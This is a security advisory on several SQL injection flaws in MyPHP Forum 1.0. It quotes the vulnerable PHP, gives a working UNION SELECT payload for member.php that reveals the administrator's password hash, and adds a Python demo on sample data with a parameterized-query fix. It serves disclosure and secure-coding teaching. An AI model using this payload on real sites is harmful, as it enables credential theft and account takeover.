
myPHP Forum 1.0 several SQL injection bugs
Several SQL injection bugs in myPHP Forum v.1.0

// GHC -> MyPHP Forum <- ADVISORY
// Product: MyPHP Forum
// Version: 1.0
// URL: 

[Product Description]
MyPHP Forum is a simple message board script with limited features.

Several SQL injection vulnerabilities may lead to disclosure of sensitive information,
including users' password hashes.

Most user-supplied variables are placed into SQL queries exactly as received, without any filtering.

[1] script name: forum.php

$query = mysql_query("SELECT fid, name FROM $db_forum WHERE fid='$fid'") or die(mysql_error());
$nav = mysql_fetch_array($query);

Possible SQL injection through the $fid variable, which is not filtered.

[2] script name: member.php

if($action == "viewpro") {
        $member = $HTTP_GET_VARS['member'];
        $sql =  "SELECT * FROM $db_member WHERE username='$member'";
        $query = mysql_query("SELECT * FROM $db_member WHERE username='$member'") or die("cant execute $sql");
        $member = mysql_fetch_array($query);

SQL code injection 
member.php?action=viewpro&member=[SQL code]

[example of exploit]
member.php?action=viewpro&member=nonexist' UNION SELECT uid, username, password, status, email, website, aim, msn, location, sig, regdate, posts, password as yahoo FROM nb_member WHERE uid='1
will show the administrator's username and password hash (the hash lands in the "Yahoo" field, because "password as yahoo" is the thirteenth column of the UNION). The UNION has to supply exactly as many columns as SELECT * returns from the member table; this payload uses 13.
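The member.php payload above, replayed against a constructed in-memory SQLite table so the mechanics can be checked offline. This is an added example, not code from the advisory or from MyPHP Forum: the table layout and rows are made up to match the thirteen columns named in the payload, the hash values are placeholder strings, and SQLite stands in for MySQL (the UNION behaves the same way here). viewpro_vulnerable() builds the query by string interpolation exactly as member.php does; viewpro_fixed() binds the value as a parameter, which is the fix that applies to every injection point in this advisory.

```python
import sqlite3

# Column order of the member table, matching the thirteen columns listed in the
# advisory's UNION payload (assumption: this is what SELECT * returns).
MEMBER_COLUMNS = ["uid", "username", "password", "status", "email", "website",
                  "aim", "msn", "location", "sig", "regdate", "posts", "yahoo"]

# The advisory's payload for member.php?action=viewpro&member=..., verbatim.
PAYLOAD = ("nonexist' UNION SELECT uid, username, password, status, email, website, "
           "aim, msn, location, sig, regdate, posts, password as yahoo "
           "FROM nb_member WHERE uid='1")


def make_db():
    """Constructed sample data: two members; the hashes are placeholder strings."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE nb_member (uid INTEGER, username TEXT, password TEXT, "
        "status TEXT, email TEXT, website TEXT, aim TEXT, msn TEXT, location TEXT, "
        "sig TEXT, regdate TEXT, posts INTEGER, yahoo TEXT)"
    )
    db.executemany(
        "INSERT INTO nb_member VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?)",
        [
            (1, "admin", "ADMIN-HASH-PLACEHOLDER", "admin", "admin@example.invalid",
             "", "", "", "", "", "2004-01-01", 10, "admin_yahoo"),
            (2, "alice", "ALICE-HASH-PLACEHOLDER", "member", "alice@example.invalid",
             "", "", "", "", "", "2004-02-01", 3, ""),
        ],
    )
    return db


def viewpro_vulnerable(db, member):
    """member.php as written: $member is pasted into the SQL string.

    The quote in the payload closes the username literal, the UNION appends the
    attacker's SELECT, and the trailing "uid='1" re-uses the query's own closing
    quote, so the statement stays syntactically valid.
    """
    sql = f"SELECT * FROM nb_member WHERE username='{member}'"
    row = db.execute(sql).fetchone()
    return dict(zip(MEMBER_COLUMNS, row)) if row else None


def viewpro_fixed(db, member):
    """Same lookup with a bound parameter: the payload is compared as a plain
    username and matches nothing, whatever quotes it contains."""
    row = db.execute("SELECT * FROM nb_member WHERE username=?", (member,)).fetchone()
    return dict(zip(MEMBER_COLUMNS, row)) if row else None


if __name__ == "__main__":
    db = make_db()
    leaked = viewpro_vulnerable(db, PAYLOAD)
    print("vulnerable:", leaked["username"], "hash in yahoo field:", leaked["yahoo"])
    print("fixed:", viewpro_fixed(db, PAYLOAD))
```

The first SELECT matches no row ("nonexist"), so the only row returned is the one the attacker's SELECT produces, with the password column duplicated into the position of "yahoo". With the bound parameter the whole payload is just a username that does not exist.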

Passwords are hashed by the encrypt() function (crypt() with the MD5 of the password used as both the input and the salt):
function encrypt($string) {
    $crypted = crypt(md5($string), md5($string));
    return $crypted;
}

[3] script name: forgot.php

$email = $_REQUEST['email'];
if (isset($email)) {
    $sql="SELECT * FROM $db_member WHERE email='$email'";
    $result = mysql_query("SELECT username FROM $db_member WHERE email='$email'");
    $username = mysql_result($result, 0);
    $msg = "
    Hello $username,

The $email variable is not filtered.
IMPACT: possible SQL injection through this variable.

[4] script name: include.php
This is the most important script, since it is included by all the others.
The $nbuser and $nbpass variables are not filtered.

$query = mysql_query("SELECT * FROM $db_member WHERE username='$nbuser'")
IMPACT: possible SQL injection through $nbuser.

P.S. All of these bugs require magic_quotes_gpc=0; with magic quotes on, the single quote that each payload needs to break out of the string literal is backslash-escaped.

/* ================================================== */
/* -- security games & challenges */ 
/* ================================================== */
/* greets to:, D0G4 & all quest hunters %)*/
/* ================================================== */
